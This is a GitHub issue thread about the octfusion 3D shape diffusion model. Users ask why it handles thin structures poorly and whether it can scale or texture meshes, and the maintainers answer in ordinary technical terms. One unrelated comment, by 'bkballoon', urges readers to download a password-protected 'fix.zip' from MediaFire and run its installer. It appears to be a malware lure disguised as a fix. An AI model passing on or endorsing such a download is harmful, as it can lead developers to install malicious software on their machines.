### ISSUE TITLE
About thin structures

### ISSUE THREAD

**Issue by LaFeuilleMorte** [octree-nn/octfusion#2]
I've tested your method with unconditional generation. However I found the model tended to produce large smooth surfaces while it's not very good at thin structures. The below are some examples. 

Smooth Surfaces:
![image](https://github.com/user-attachments/assets/0e679399-726c-4621-a4f4-e2c05fb20248)

Thin structures:
![image](https://github.com/user-attachments/assets/e888b11e-9074-4bc6-92ca-c2d85ce86055)

Can you give me some advices on how to avoid this and maintain high quality when dealing with thin structures. BTW,  can this model be scaled up to be able to generate universal kinds of 3D meshes (For example, generate table, chairs and various furnitures using only one diffusion pretrained weights) ? And can we generate textured meshes using this?

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wst2001** [comment]
Our model has the ability to generate thin structure (e.g., the chair legs in the figure), but we admitted that it is not good enough (e. g., the chair back), due to the model's insufficient resolution(octree in 64^3 and mesh in 256^3).
We have provided category-conditional model and weights (see README), which can generate category-specific meshes in one model.
Our model can generate textured meshes, which is presented in our paper. We have not release the code for textured generation and it will come later.

**Comment by MarcusLoppe** [comment]
> Our model has the ability to generate thin structure (e.g., the chair legs in the figure), but we admitted that it is not good enough (e. g., the chair back), due to the model's insufficient resolution(octree in 64^3 and mesh in 256^3). We have provided category-conditional model and weights (see README), which can generate category-specific meshes in one model. Our model can generate textured meshes, which is presented in our paper. We have not release the code for textured generation and it will come later.
>

Do you think this is a issue with SDF or using a higher resolution for the octree/diffusion model can resolve?

I'm not a fan of using SDF with ML since it's probabilistic nature isn't great for small details,  and if the SDF value is little bit off it doesn't look great. 
But for SDF-based models, yours is far the best I've seen.
![bild](https://github.com/user-attachments/assets/d596ee9a-d02f-4725-adec-7d759f2424c0)

Was the main limitation VRAM issue when you tried to go past 64^3? Also have you experimented with higher octree resolutions to prevent issues like below:
![bild](https://github.com/user-attachments/assets/7edab052-16f2-4491-bf04-d6a6ff76c0df)

**Comment by wst2001** [comment]
Yes. Experiments on higher resolution (e. g. 1024^3) resquire much more memory and time, since we conduct most of our experiments on Nvidia 4090 with 24GB memory. And They are more complex because we need to add a new stage to generate 256^3 octree.
We have conducted an single-category experiment on 1024^3 resolution using A100 and get finer details (Fig. 13 in paper).
